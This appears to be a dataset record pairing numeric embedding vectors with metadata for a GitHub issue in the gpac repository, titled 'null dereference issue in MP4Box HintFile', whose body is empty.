0.008333902806043625, 0.028296126052737236, 0.028263509273529053, 0.008227894082665443, 0.0030130890663713217, -0.006837551016360521, -0.008280898444354534, -0.008260511793196201, -0.005222959443926811, 0.0028479602187871933, 0.0117914117872715, 0.029388830065727234, -0.014400852844119072, -0.009540769271552563, -0.002756222151219845, 0.011033043265342712, -0.0040262858383357525, 0.006784546654671431, -0.0044034318998456, 0.01120428740978241, 0.005642916541546583, 0.00025126064429059625, 0.00543089909479022, 0.018054069951176643, -0.007693774066865444, -0.005194418597966433, 0.0041221012361347675, 0.019391408190131187, -0.02136479876935482, -0.005545062478631735, 0.007322744000703096, -0.006360512692481279, 0.00860300101339817, -0.006788623984903097, -0.02263690158724785, -0.004904933739453554, -0.0029743551276624203, 0.00037638130015693605, -0.012133901007473469, 0.0007446081144735217, -0.01628454402089119, 0.0055899121798574924, 0.012533471919596195, 0.02782316505908966, -0.001975428545847535, 0.010193129070103168, 0.0062993536703288555, 0.009565232321619987, 0.007971026934683323, -0.010568236000835896, 0.009499995969235897, -0.028834324330091476, -0.0007823226624168456, 0.007759009953588247, 0.000025371335141244344, -0.017466945573687553, 0.01054377295076847, 0.018804285675287247, -0.005545062478631735, 0.009728322736918926, -0.016675960272550583, 0.0033881962299346924, -0.00640128506347537, -0.00485600670799613, 0.0065521434880793095, 0.0035900201182812452, -0.014188836328685284, 0.002733797300606966, -0.013479393906891346, -0.0024626599624753, 0.0020579928532242775, 0.006058795843273401, -0.008289053104817867, 0.002733797300606966, 0.007897636853158474, -0.003247530898079276, -0.019994841888546944, -0.004330041352659464, 0.03315621241927147, -0.0078079369850456715, 0.003027359489351511, 0.029829172417521477, 0.006959868595004082, 0.0026094410568475723, 0.0010188032174482942, 0.003875427646562457, -0.010250210762023926, -0.008252357132732868, 0.009116734378039837, 0.006124032195657492, 0.011041197925806046, -0.004154719412326813, 0.028393980115652084, 0.004484976641833782, -0.0023872307501733303, 0.00028107553953304887, -0.03098711371421814, -0.0018347632139921188, -0.002487123478204012, 0.010878107510507107, 0.005561371333897114, -0.000058323810662841424, -0.008382829837501049, -0.004383045714348555, -0.012133901007473469, -0.002489162143319845, -0.0059487102553248405, -0.02606179192662239, 0.0036939899437129498, -0.00006606421811738983, -0.013878964819014072, 0.004953860770910978, -0.004970169626176357, 0.002839805791154504, -0.0009433741215616465, -0.020109005272388458, -0.01144892256706953, -0.02953561209142208, 0.021299563348293304, 0.011693557724356651, 0.02345235086977482, -0.022424884140491486, -0.0005840663216076791, -0.0014637333806604147, -0.009345061145722866, 0.013952354900538921, 0.016651496291160583, -0.017091838642954826, -0.016765659675002098, 0.0005611317465081811, 0.014131754636764526, -0.016398705542087555, 0.027072951197624207, 0.03793475031852722, 0.0021935615222901106, -0.003924354910850525, 0.002554398262873292, -0.0010600854875519872, 0.003420814173296094, -0.004160835407674313, -0.010462228208780289, 0.0045012859627604485, 0.024365656077861786, -0.004062981344759464, 0.014392698183655739, -0.0062585812993347645, 0.006768237799406052, -0.001809280482120812, 0.020109005272388458, 0.009524459950625896, 0.011179824359714985, 0.013609865680336952, -0.002099784556776285, 0.00764484703540802, 0.004945706110447645, -0.02208239585161209, -0.022212866693735123, -0.012256218120455742, 0.009671241044998169, 0.012721025384962559, 0.014898277819156647, -0.014808578416705132, 0.011416304856538773, 0.004807079676538706, 0.002321994863450527, 0.023827459663152695, -0.009304288774728775, -0.010266520082950592, -0.01873904839158058, -0.0008037282386794686, -0.0017277353908866644, 0.005879397038370371, 0.01753218285739422, -0.034444622695446014, 0.011571240611374378, 0.008183044381439686, -0.00647059828042984, -0.00459506269544363, -0.009287979453802109, -0.0004869767581112683, -0.0003226125263608992, 0.012647634372115135, -0.017988834530115128, -0.009214588440954685, -0.026665225625038147, 0.0027766083367168903, 0.008594846352934837, 0.02299569919705391, 0.00499055627733469, 0.021495271474123, -0.009924030862748623, -0.0274643674492836, -0.0022710291668772697, -0.015330466441810131, -0.012256218120455742, -0.010674244724214077, -0.0029152350034564734, 0.013495703227818012, -0.010763944126665592, -0.020745055750012398, -0.02077767439186573, -0.0020957074593752623, 0.016268234699964523, -0.00950815062969923, -0.007734546437859535, -0.02389269508421421, -0.03085664100944996, -0.004574676509946585, 0.005328968167304993, -0.009402142837643623, -0.013878964819014072, 0.027790548279881477, -0.0035574021749198437, -0.006397207733243704, 0.011864802800118923, -0.010812871158123016, -0.0176137275993824, 0.0035145909059792757, -0.004864161368459463, -0.005712229758501053, -0.0039019298274070024, -0.025556214153766632, -0.02677938900887966, 0.0027317586354911327, -0.011864802800118923, -0.0035084751434624195, -0.008529610931873322, 0.008505146950483322, -0.010217593051493168, -0.011049351654946804, -0.00995664857327938, 0.019228318706154823, 0.01088626217097044, 0.01429484412074089, -0.005810083821415901, 0.003467702539637685, -0.007110727019608021, 0.012011583894491196, -0.004113947041332722, -0.01144892256706953, 0.00473368912935257, -0.0037959213368594646, 0.011563085950911045, -0.01906522922217846, -0.017581108957529068, -0.007587765343487263, 0.02854076214134693, 0.006327894516289234, -0.008337980136275291, 0.005528753157705069, 0.005426821764558554, -0.0039549339562654495, 0.00015531780081801116, 0.01860857754945755, 0.00788948219269514, -0.015566946938633919, 0.00898626260459423, 0.010078966617584229, 0.0034126597456634045, -0.009402142837643623, -0.003910084255039692, 0.001728754723444581, -0.029698701575398445, -0.024284111335873604, -0.025963937863707542, 0.0010529502760618925, -0.022963082417845726, 0.0076407697051763535, 0.00001606214209459722, 0.021103855222463608, 0.005227036774158478, -0.008529610931873322, 0.005328968167304993, 0.024202566593885422, 0.010560082271695137, 0.010217593051493168, 0.022066086530685425, 0.00835836585611105, 0.00998111255466938, -0.0007787550566717982, 0.0009810887277126312, -0.018771667033433914, 0.008439910598099232, -0.01960342563688755, -0.001373014529235661, -0.014800423756241798, -0.005687766242772341, -0.0014943127753213048, 0.01140815019607544, -0.003767380490899086, 0.02146265283226967, 0.0017440443625673652, -0.020810293033719063, -0.004811157006770372, -0.004346350207924843, 0.0156729556620121, 0.018054069951176643, 0.003732723882421851, 0.006446134764701128, -0.0028255353681743145, -0.017956215888261795, -0.006727465428411961, 0.002283260924741626, 0.034542474895715714, -0.008521456271409988, -0.015844199806451797, 0.005748924799263477, -0.025866083800792694, 0.022115012630820274, 0.002260836074128747, -0.0013495703460648656, -0.01641501486301422, -0.0001040336283040233, -0.0028581535443663597, -0.005716307088732719, 0.0064665209501981735, -0.014360080473124981, 0.014930895529687405, 0.0033290761057287455, -0.013544630259275436, -0.00129554676823318, 0.02006007917225361, -0.0021487115882337093, 0.01050300057977438, 0.004904933739453554, 0.0029315438587218523, 0.008578537963330746, 0.012231755070388317, 0.019358791410923004, -0.01653733290731907, 0.009092271327972412, -0.013259222730994225, -0.012362226843833923, -0.007893559522926807, -0.013406003825366497, -0.0033209214452654123, 0.018999991938471794, 0.003932509105652571, -0.02480599842965603, -0.002421887591481209, 0.002617595484480262, 0.007188194897025824, 0.003934547770768404, -0.02200084924697876, 0.020272094756364822, 0.002350535709410906, 0.01679827645421028, 0.004974246956408024, -0.0003366280870977789, -0.00009536946163279936, -0.00388358230702579, 0.007432830054312944, -0.0071270358748734, 0.008937335573136806, -0.006784546654671431, -0.00486823869869113, -0.014653642661869526, 0.005459439940750599, -0.008912872523069382, 0.006959868595004082, -0.02909526787698269, 0.03382487967610359, -0.012663943693041801, -0.00862746499478817, 0.00272156554274261, -0.01355278491973877, -0.00839913822710514, 0.01615407131612301, -0.029617156833410263, 0.004444204270839691, -0.03152531012892723, -0.004705148283392191, 0.03571672365069389, 0.01824977807700634, -0.0062422724440693855, -0.0009948493679985404, -0.022604282945394516, -0.00834613386541605, 0.004631757736206055, -0.008309438824653625, -0.007139267865568399, -0.005157723557204008, -0.015884973108768463, -0.011179824359714985, 0.006397207733243704, -0.016251925379037857, -0.018543340265750885, 0.003314805682748556, -0.003704183269292116, -0.03022058866918087, 0.001948926248587668, 0.006376821547746658, -0.011033043265342712, 0.019163083285093307, 0.0046684532426297665, -0.017418019473552704, 0.012158364988863468, 0.009948493912816048, 0.004533903673291206, 0.0019336366094648838, -0.00991587620228529, -0.006682615727186203, 0.008660082705318928, -0.013104286976158619, -0.03188410773873329, -0.01656179688870907, 0.01807037927210331, -0.007873172871768475, -0.000021787813238915987, -0.011081970296800137, 0.009320597164332867, -0.013406003825366497, 0.026453208178281784, 0.0002197893481934443, 0.0255235955119133, 0.001258851494640112, -0.003439161693677306, -0.020304713398218155, 0.003331114538013935, -0.009067807346582413, 0.005822315346449614, 0.017287546768784523, -0.01720600202679634, 0.0018286473350599408, -0.016781967133283615, -0.0042321872897446156, -0.011799566447734833, 0.022930463775992393, 0.008488837629556656, -0.0045257494784891605, -0.0007537819328717887, -0.0007807937217876315, 0.020027460530400276, 0.008415447548031807, -0.0007634653593413532, -0.018412869423627853, 0.010519308969378471, 0.0265673715621233, 0.006976177450269461, -0.0036634106654673815, -0.003814268857240677, -0.007775318808853626, 0.000890879484359175, -0.021250635385513306, 0.013136904686689377, -0.0035023591481149197, 0.0034880887251347303, 0.019260937348008156, 0.002613518387079239, 0.011497849598526955, 0.009002571925520897, -0.013381539843976498, 0.006556220818310976, -0.0046766079030931, 0.0068864780478179455, 0.008700855076313019, 0.0073472075164318085, 0.012476390227675438, -0.005528753157705069, -0.01133476011455059, -0.018820593133568764, -0.000028015178031637333, -0.0029091190081089735, -0.00030018764664418995, -0.006804932840168476, -0.00620965426787734, -0.005271886475384235, 0.003390234662219882, 0.028247199952602386, 0.014800423756241798, -0.008888408541679382, 0.0005667379591614008, 0.006205576937645674, 0.0002099784614983946, -0.012435617856681347, 0.013071669265627861, 0.002109977649524808, 0.020679820328950882, -0.012818879447877407, 0.004071136005222797, 0.004631757736206055, 0.0024850848130881786, -0.0032149129547178745, -0.0032984965946525335, 0.006152572575956583, -0.010136047378182411, -0.008554073981940746, 0.006507293786853552, 0.006841628346592188, -0.0009489803342148662, 0.009972957894206047, 0.00860300101339817, -0.0071270358748734, 0.002344419714063406, 0.017548492178320885, -0.00034631157177500427, 0.01133476011455059, -0.014947204850614071, -0.012981968931853771, -0.009345061145722866, 0.008554073981940746, 0.006857937201857567, -0.004888624884188175, 0.006572529673576355, 0.00525150028988719, -0.009239052422344685, -0.0008618290885351598, 0.011677248403429985, -0.008350211195647717, 0.013846347108483315, 0.01797252520918846, 0.017874671146273613, 0.0038550414610654116, 0.004758152645081282, 0.008252357132732868, 0.0019203855190426111, 0.010087120346724987, -0.0011232828255742788, -0.018331322818994522, 0.002725642640143633, 0.015933899208903313, -0.003021243494004011, -0.005687766242772341, 0.012435617856681347, -0.018331322818994522, 0.00998111255466938, -0.011522313579916954, 0.001704291207715869, 0.017450638115406036, -0.006809010170400143, 0.022620592266321182, 0.0011936153750866652, -0.003846887033432722, -0.017042912542819977, 0.012769952416419983, -0.004264805465936661, -0.03464033082127571, -0.007595920003950596, 0.009606004692614079, 0.014531324617564678, 0.00045818116632290184, -0.0053371223621070385, -0.006951713934540749, 0.019636044278740883, 0.005271886475384235, -0.02023947797715664, 0.011546776629984379, -0.00499055627733469, 0.00835836585611105, 0.006739696953445673, 0.013577247969806194, 0.006527679972350597, -0.008684545755386353, -0.0020895914640277624, -0.0016339586582034826, 0.00009823628352023661, 0.004264805465936661, 0.016928749158978462, -0.018722739070653915, 0.0025931319687515497, -0.0050027878023684025, 0.014417162165045738, -0.00499055627733469, 0.007449138909578323, 0.02434934675693512, -0.021739905700087547, -0.02827981859445572, -0.025490976870059967, -0.008048495277762413, 0.009385833516716957, 0.009866949170827866, 0.03757595270872116, -0.009475532919168472, 0.005161800421774387, 0.014751496724784374, -0.0014148063492029905, 0.0023974240757524967, 0.012321454472839832, -0.0037714578211307526, -0.013724029064178467, -0.006707079242914915, -0.004941629245877266, -0.007000640965998173, -0.019456645473837852, -0.004847852047532797, -0.0028214582707732916, 0.023876385763287544, 0.019228318706154823, 0.023631751537322998, -0.01341415848582983, -0.01061716303229332, -0.0005983366863802075, -0.011424459517002106, -0.015077676624059677, -0.0008842539391480386, 0.02759484015405178, 0.00009887335181701928, -0.014661797322332859, -0.009663086384534836, -0.0033515009563416243, 0.033987969160079956, 0.0034738185349851847, -0.01379742007702589, -0.00207124394364655, -0.009924030862748623, 0.0017277353908866644, 0.025327887386083603, -0.004615448880940676, 0.029600847512483597, 0.011954502202570438, -0.019342482089996338, -0.0029763937927782536, -0.01807037927210331, -0.02195192314684391, 0.006022100802510977, 0.00042046658927574754, 0.0019835829734802246, 0.004236264619976282, -0.02539312280714512, 0.020125314593315125, 0.005773388314992189, -0.019750207662582397, 0.010845489799976349, -0.014694415032863617, 0.006548066157847643, -0.0009087174548767507, 0.004957938101142645, -0.011212442070245743, 0.014042055234313011, -0.015624028630554676, -0.08943859487771988, 0.00901072658598423, 0.018396560102701187, 0.005834547337144613, 0.02371329627931118, -0.014588406309485435, -0.0054635172709822655, 0.010568236000835896, -0.004448281601071358, -0.010674244724214077, -0.006107722874730825, -0.011318450793623924, 0.00901072658598423, 0.005687766242772341, 0.01203604694455862, 0.009133043698966503, 0.0002343145606573671, 0.01172617543488741, 0.013332612812519073, -0.01011973898857832, -0.005577680189162493, -0.008790554478764534, -0.04002230241894722, -0.004921242594718933, 0.0006625534151680768, -0.015550637617707253, 0.01391158252954483, -0.006735619623214006, -0.023060934618115425, 0.0004161345132160932, -0.0054227448999881744, 0.005174032412469387, -0.003810191759839654, -0.005973173771053553, -0.015893127769231796, -0.029486684128642082, 0.008855790831148624, -0.013161368668079376, -0.005068023689091206, 0.005842701531946659, -0.0035186682362109423, 0.01753218285739422, -0.014824886806309223, -0.002350535709410906, 0.00562252989038825, 0.00834613386541605, -0.015379393473267555, 0.011171669699251652, -0.01165278535336256, 0.011538621969521046, -0.01332445815205574, 0.011554931290447712, 0.01328368578106165, -0.011212442070245743, -0.011742484755814075, -0.004028324503451586, -0.01572188176214695, -0.008052571676671505, -0.00544313108548522, 0.007326821330934763, 0.010796562768518925, 0.0007216735393740237, 0.008961799554526806, -0.00349420472048223, -0.004913088399916887, 0.014384543523192406, 0.0046684532426297665, 0.017418019473552704, 0.025915011763572693, -0.007102572359144688, -0.0068457056768238544, 0.004069097340106964, 0.013406003825366497, -0.005361585877835751, 0.0045583671890199184, 0.007583688013255596, -0.010396991856396198, 0.010609009303152561, 0.006727465428411961, 0.009491842240095139, 0.013463085517287254, -0.0028724237345159054, -0.000926045817323029, 0.00035828849649988115, -0.005610298365354538, -0.007661155890673399, 0.009165661409497261, 0.01088626217097044, 0.019212009385228157, 0.012525317259132862, 0.012068664655089378, -0.000050678965635597706, 0.0007094417815096676, 0.027611147612333298, 0.00770192826166749, 0.007812014315277338, -0.00816673506051302, 0.012549780309200287, 0.008089267648756504, 0.015175530686974525, -0.000890879484359175, 0.0006335029611364007, 0.002213947707787156, -0.0022078317124396563, -0.00020424483227543533, -0.01829870603978634, 0.0006350319599732757, -0.025670377537608147, 0.003995706792920828, -0.02412102185189724, 0.0264205913990736, -0.0009087174548767507, 0.007750855293124914, -0.00782424584031105, 0.015966517850756645, 0.004346350207924843, 0.010388837195932865, 0.004631757736206055, -0.022457502782344818, -0.006066950503736734, -0.021837759763002396, -0.007775318808853626, 0.0036532175727188587, -0.007351284846663475, -0.0012364265276119113, 0.005304504651576281, -0.00989141222089529, -0.014074672944843769, -0.00428111432120204, -0.005536907818168402, 0.03035106137394905, 0.008077035658061504, 0.005989482626318932, 0.014539479278028011, 0.004843775182962418, -0.029829172417521477, 0.007799782324582338, -0.015933899208903313, 0.021756215021014214, -0.0016105143586173654, -0.004599140025675297, -0.010136047378182411, 0.02050042152404785, -0.007273816969245672, -0.016814585775136948, -0.0011732291895896196, -0.016651496291160583, 0.015868663787841797, 0.010372527875006199, -0.0034880887251347303, 0.001725696725770831, 0.008717164397239685, 0.00400182232260704, 0.01689613051712513, 0.009654931724071503, -0.0006849782657809556, 0.01793990656733513, 0.00019940308993682265, 0.011775102466344833, -0.005618453025817871, 0.003367809811607003, 0.009679395705461502, -0.010609009303152561, 0.02389269508421421, -0.011938192881643772, -0.015558792278170586, 0.0021160936448723078, -0.0016156110214069486, -0.0014372311998158693, 0.015599564649164677, 0.01476780604571104, 0.02823089063167572, -0.018755357712507248, 0.009760940447449684, 0.0006651016883552074, 0.006601070519536734, -0.013813728466629982, -0.01771158166229725, -0.0006686692941002548, -0.01633347012102604, -0.0002348242123844102, -0.008085190318524837, -0.003021243494004011, -0.020679820328950882, 0.000003941874183510663, -0.006804932840168476, 0.01068239938467741, 0.018054069951176643, -0.005194418597966433, 0.0123132998123765, 0.03464033082127571, 0.03116651251912117, -0.0032026811968535185, -0.000621780869551003, 0.012288836762309074, 0.018396560102701187, -0.006270813290029764, 0.008839481510221958, -0.021527888253331184, -0.005263731814920902, 0.022963082417845726, 0.0045828307047486305, 0.01086179818958044, -0.0018378212116658688, -0.003200642531737685, 0.002536050509661436, 0.006768237799406052, -0.0013556862249970436, -0.00035752399708144367, 0.005912014748901129, 0.010445918887853622, 0.0022812222596257925, 0.00006437598494812846, -0.00862746499478817, -0.006894632708281279, -0.011978965252637863, -0.011179824359714985, 0.02001115120947361, -0.011978965252637863, 0.026893552392721176, 0.00950815062969923, -0.005194418597966433, 0.01829870603978634, -0.0001644916192162782, 0.0045257494784891605, -0.0137077197432518, 0.023957930505275726, 0.007008795626461506, 0.0068864780478179455, 0.020516730844974518, -0.006393130868673325, -0.0006192325963638723, 0.009687550365924835, 0.01960342563688755, 0.0018174349097535014, 0.01391158252954483, 0.00995664857327938, -0.01526523008942604, 0.0025503209326416254, 0.0017399671487510204, 0.038684964179992676, -0.006543988827615976, -0.0012476390693336725, -0.005532830487936735, -0.0156974196434021, 0.019179392606019974, 0.03212874382734299, -0.005875319708138704, 0.003161908593028784, -0.011057506315410137, -0.002248604316264391, -0.010609009303152561, -0.02090814709663391, 0.018624885007739067, 0.015232612378895283, 0.01595020852982998, -0.00925536174327135, 0.00497832428663969, -0.010462228208780289, 0.010307292453944683, -0.002109977649524808, -0.0011059545213356614, 0.014996131882071495, 0.002403539838269353, -0.019945915788412094, 0.0013770917430520058, 0.018804285675287247, -0.015452783554792404, 0.003789805341511965, 0.001979505643248558, 0.0006115877768024802, -0.010168666020035744, -0.016398705542087555, 0.0016849242383614182, -0.007143344730138779, -0.004998710472136736, -0.009320597164332867, -0.004635835066437721, -0.02583346702158451, -0.010331755504012108, -0.013055359944701195, -0.01636608876287937, -0.015909435227513313, -0.0005315716844052076, -0.005712229758501053, 0.012362226843833923, -0.022343339398503304, -0.009027034975588322, -0.024969089776277542, 0.00842360220849514, 0.008439910598099232, -0.005267809145152569, -0.006022100802510977, 0.00207124394364655, -0.025621449574828148, 0.005165877752006054, 0.0020498381927609444, 0.010527463629841805, -0.009834331460297108, -0.007175962906330824, 0.0234360434114933, 0.0029172736685723066, -0.02899741381406784, -0.00888025388121605, 0.03093818575143814, -0.011016733944416046, 0.012109437957406044, 0.016749350354075432, -0.0026685611810535192, 0.010030039586126804, 0.00023558869725093246, -0.009027034975588322, -0.012525317259132862, -0.003606329206377268, 0.005263731814920902, 0.0011232828255742788, -0.005483903456479311, -0.017450638115406036, 0.0014739264734089375, -0.009198280051350594, 0.0008052571793086827, 0.003182295011356473, -0.02335449680685997, -0.00207328237593174, 0.0070373364724218845, 0.0137321837246418, 0.0008246241486631334, -0.004639912396669388, 0.011840338818728924, 0.013454930856823921, 0.010755790397524834, 0.001549355685710907, -0.01443347055464983, 0.0007894578739069402, -0.007416520733386278, 0.01656179688870907, -0.021935613825917244, -0.014482397586107254, -0.024512436240911484, -0.01413990929722786, 0.012533471919596195, 0.01991329714655876, -0.005198495928198099, 0.01338969450443983, 0.0034554707817733288, -0.02072874829173088, 0.01694505847990513, 0.009067807346582413, 0.023044627159833908, 0.009181970730423927, -0.013071669265627861, 0.022441193461418152, 0.01203604694455862, 0.014229608699679375, 0.011041197925806046, -0.012631325982511044, -0.014066518284380436, -0.02403947524726391, -0.0044034318998456, -0.003098711371421814, 0.005789697170257568, -0.01630900613963604, 0.002511586993932724, -0.04305577650666237, -0.028883250430226326, 0.006181113421916962, 0.01694505847990513, 0.012190982699394226, 0.02917681261897087, -0.008700855076313019, -0.005728538613766432, -0.02664891630411148, 0.006519525311887264, 0.07984890043735504, 0.020272094756364822, -0.016912439838051796, 0.00021087036293465644, 0.01643947884440422, 0.0012659867061302066, -0.01522445771843195, 0.05411328375339508, 0.011595703661441803, 0.021103855222463608, 0.016961367800831795, 0.003231222042813897, 0.00798733625560999, -0.00562252989038825, -0.020109005272388458, -0.01502059493213892, 0.010339910164475441, -0.00026005221297964454, -0.009345061145722866, 0.017010293900966644, 0.0018745164852589369, 0.006038409657776356, 0.014376389794051647, -0.019717589020729065, -0.004754075314849615, -0.005891628563404083, -0.020533040165901184, -0.028345054015517235, -0.007273816969245672, 0.03136222064495087, -0.024186257272958755, 0.010005575604736805, 0.003995706792920828, 0.010348064824938774, -0.012411153875291348, 0.004798925016075373, 0.005973173771053553, 0.017907289788126945, -0.007759009953588247, -0.008847636170685291, 0.028605997562408447, -0.010527463629841805, 0.006058795843273401, -0.0013719951966777444, 0.010021884925663471, 0.008431756868958473, -0.006543988827615976, -0.007041413802653551, 0.014278535731136799, -0.009451069869101048, 0.010576390661299229, -0.00497832428663969, 0.015566946938633919, -0.005292272660881281, 0.00839913822710514, 0.015412011183798313, 0.019619734957814217, 0.009565232321619987, 0.010927034541964531, -0.005076178349554539, 0.009793558157980442, -0.014531324617564678, -0.005712229758501053, 0.0050027878023684025, -0.00408948352560401, -0.011930038221180439, -0.022327030077576637, 0.004128217231482267, -0.012541626580059528, -0.011310296133160591, 0.006898710038512945, -0.011938192881643772, -0.018445486202836037, 0.008337980136275291, 0.009630468674004078, -0.013495703227818012, 0.013544630259275436, 0.007587765343487263, 0.008252357132732868, -0.003908045589923859, -0.009769095107913017, -0.0010458150645717978, -0.017825745046138763, 0.013503857888281345, -0.005381972063332796, 0.014572097919881344, 0.0039855134673416615, -0.025230033323168755, -0.01996222510933876, 0.015884973108768463, 0.00008594081737101078, -0.0026359432376921177, -0.013683256693184376, -0.006878323387354612, -0.013642484322190285, -0.008668237365782261, 0.02046780288219452, 0.010470381937921047, 0.0030355139169842005, -0.014939050190150738, -0.0059650191105902195, 0.01235407218337059, -0.022115012630820274, -0.010723171755671501, -0.010715017095208168, 0.018543340265750885, 0.022473812103271484, 0.0006391091737896204, 0.015281539410352707, -0.0244798194617033, 0.0010631433688104153, 0.01100042462348938, -0.010992270894348621, 0.007779396139085293, -0.0027419517282396555, -0.013984973542392254, 0.005642916541546583, 0.00957338698208332, 0.013683256693184376, -0.020581966266036034, 0.0005657186848111451, 0.016341624781489372, 0.011742484755814075, -0.0012231755536049604, -0.004782616160809994, 0.007697851397097111, 0.008937335573136806, -0.01445793453603983, 0.0021446344908326864, 0.026257500052452087, 0.010633472353219986, -0.0014351926511153579, 0.005365663208067417, -0.0013740338617935777, 0.01610514335334301, 0.0031252133194357157, 0.002483046380802989, -0.013569093309342861, -0.017727890983223915, 0.023272952064871788, 0.02416994795203209, -0.0045012859627604485, 0.01197081059217453, 0.007139267865568399, 0.009271670132875443, 0.02266952022910118, -0.00622188625857234, -0.012859651818871498, 0.0205982755869627, 0.003636908484622836, -0.003218990284949541, 0.00142601877450943, 0.012133901007473469, -0.007795704994350672, 0.008329825475811958, -0.005271886475384235, -0.023827459663152695, 0.004953860770910978, 0.025083253160119057, 0.022620592266321182, -0.002536050509661436, 0.0043748910538852215, -0.005916092079132795, 0.031411148607730865, 0.01082102581858635, -0.0255725234746933, 0.007759009953588247, 0.003479934297502041, 0.0040262858383357525, -0.013055359944701195, 0.004124139901250601, -0.006980254780501127, -0.0064257485792040825, 0.006817164830863476, -0.0022914153523743153, 0.009361369535326958, -0.010396991856396198, -0.012859651818871498, -0.008929180912673473, -0.001839859876781702, -0.02425149269402027, 0.006617379374802113, 0.013895274139940739, 0.04974247142672539, 0.006376821547746658, 0.021886687725782394, 0.011399995535612106, 0.01393604651093483, 0.0015055252006277442, -0.01658625900745392, 0.012647634372115135, 0.028035182505846024, -0.0015412011416628957, -0.005675534252077341, -0.026322737336158752, 0.009279824793338776, 0.015330466441810131, 0.001029506092891097, -0.011481541208922863, 0.014384543523192406, -0.007469525095075369, -0.00008058943058131263, 0.017744198441505432, 0.019489262253046036, 0.0034880887251347303, 0.014196990057826042, -0.015175530686974525, -0.003384118899703026, -0.009483687579631805, -0.014474243856966496, 0.021169090643525124 ]
128
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
null
null dereference issue in MP4Box HintFile
https://api.github.com/repos/gpac/gpac/issues/1754/comments
0
2021-04-22T08:40:51
2023-09-22T06:15:28Z
https://github.com/gpac/gpac/issues/1754
864,697,432
1,754
false
This is a GitHub Issue repo:gpac owner:gpac Title : null dereference issue in MP4Box HintFile Issue date: --- start body --- None --- end body ---
148
[ -0.011579202488064766, 0.03443921357393265, -0.003941004630178213, 0.029475657269358635, 0.024017201736569405, 0.010101781226694584, -0.026593593880534172, 0.05438076704740524, 0.004450460430234671, 0.009337597526609898, -0.019563103094697, 0.03880597651004791, 0.01687026582658291, 0.015414677560329437, -0.0010616695508360863, 0.02225594036281109, -0.020654793828725815, -0.0008574323146604002, -0.019111869856715202, -0.0061389426700770855, 0.03877686336636543, -0.035108782351017, -0.011630148626863956, 0.0379326231777668, -0.006910404190421104, 0.010996967554092407, -0.03947554528713226, 0.008282295428216457, 0.0017967415042221546, 0.012139604426920414, 0.004879858810454607, 0.009264817461371422, 0.0036426091101020575, 0.01455587986856699, 0.06550145894289017, 0.003360588802024722, 0.05772862210869789, 0.04480300098657608, -0.00017467056750319898, 0.00262915575876832, -0.002550917910411954, -0.0432891882956028, -0.0462585873901844, 0.0071578542701900005, -0.009701494127511978, 0.029300987720489502, 0.025327231734991074, 0.0162880290299654, -0.028631417080760002, 0.00025700224796310067, 0.022124938666820526, -0.03435187786817551, -0.012714561074972153, -0.054555438458919525, -0.01566212624311447, -0.0406109057366848, 0.019970668479800224, 0.01049479003995657, -0.0025490985717624426, 0.03714660555124283, -0.012052268721163273, 0.042939845472574234, -0.009599602781236172, 0.028995312750339508, -0.0030803880654275417, 0.03318740800023079, -0.0012954733101651073, 0.02227049693465233, -0.015327341854572296, 0.022765396162867546, 0.022561613470315933, -0.019388431683182716, -0.0023744278587400913, 0.02232871949672699, 0.017292385920882225, -0.036971934139728546, 0.04253228008747101, 0.033449411392211914, -0.023551413789391518, 0.024744996801018715, -0.04189182445406914, 0.00885725300759077, -0.02708849310874939, 0.003407895565032959, -0.007481722626835108, -0.007998456247150898, -0.023245740681886673, -0.06334719061851501, -0.02976677566766739, -0.028951644897460938, 0.007416220847517252, 0.028806086629629135, 0.0029766776133328676, -0.0062663066200912, 0.00759089132770896, -0.00043417460983619094, -0.003631692146882415, -0.0007464437512680888, -0.04256139323115349, -0.013296796940267086, -0.03301273658871651, -0.028689639642834663, 0.011586480773985386, 0.01215416006743908, -0.0006004300666972995, 0.0018376798834651709, 0.05417698621749878, -0.0229837354272604, -0.001709406147710979, 0.1307700276374817, 0.02505066990852356, -0.01691393367946148, -0.030654683709144592, 0.0007186965667642653, 0.011950377374887466, 0.035545460879802704, -0.018529634922742844, -0.04326007515192032, -0.026695484295487404, -0.03935910016298294, -0.014439432881772518, 0.016768373548984528, 0.0013637039810419083, 0.01759805902838707, 0.0009752439800649881, 0.03315829485654831, -0.024526657536625862, -0.012437999248504639, -0.0251380056142807, -0.010385620407760143, -0.03935910016298294, -0.006248111370950937, 0.0250652264803648, -0.0108950762078166, -0.014948888681828976, 0.008398742415010929, -0.013922699727118015, 0.02232871949672699, 0.009272095747292042, 0.008376909419894218, -0.0667823776602745, -0.05353652685880661, 0.03601124882698059, -0.046462368220090866, -0.02302740328013897, 0.003766333917155862, 0.0022288691252470016, -0.0237260852009058, -0.043143630027770996, -0.004279428627341986, -0.008304129354655743, -0.02918453887104988, 0.00885725300759077, 0.004392236936837435, 0.04529789835214615, 0.013806252740323544, 0.01048751175403595, 0.0251380056142807, -0.039708442986011505, 0.0055567072704434395, 0.007387109100818634, -0.02914087288081646, 0.00852974597364664, -0.012212383560836315, -0.005163698457181454, -0.02716127224266529, 0.012547168880701065, 0.031469814479351044, -0.02304195798933506, 0.017292385920882225, -0.005636764690279961, -0.008602525107562542, 0.016797484830021858, 0.0014555880334228277, -0.04794706776738167, -0.015778573229908943, 0.01359519176185131, 0.05513767525553703, -0.023333076387643814, -0.015836797654628754, -0.022066714242100716, 0.025254452601075172, 0.009563213214278221, -0.025516457855701447, 0.0002920273400377482, -0.014694160781800747, 0.04809262976050377, -0.004694271367043257, 0.0229837354272604, -0.024759551510214806, -0.008988255634903908, 0.004541434813290834, -0.025458235293626785, -0.007860175333917141, 0.047714173793792725, -0.022809064015746117, -0.051906269043684006, -0.029650328680872917, -0.018078403547406197, 0.01756894774734974, 0.02100413478910923, -0.017088603228330612, 0.010065390728414059, -0.008711694739758968, -0.062066271901130676, 0.005491205956786871, -0.019868776202201843, 0.02430832013487816, 0.01898086816072464, -0.008420576341450214, -0.016884820535779, -0.01624436303973198, 0.018558748066425323, 0.006375475320965052, -0.00951954536139965, 0.019795997068285942, -0.013413243927061558, -0.0022143132518976927, 0.0015747642610222101, -0.03184826672077179, 0.028296630829572678, 0.004112035967409611, 0.022590726613998413, -0.002905717585235834, -0.0094831557944417, -0.003160445485264063, -0.008638914674520493, 0.017976511269807816, 0.009883442893624306, -0.008624359034001827, 0.015400120988488197, 0.0094831557944417, 0.004519600886851549, -0.005360202863812447, 0.011440921574831009, 0.007288856897503138, -0.0037335832603275776, -0.023478634655475616, -0.0052801454439759254, 0.006823068950325251, 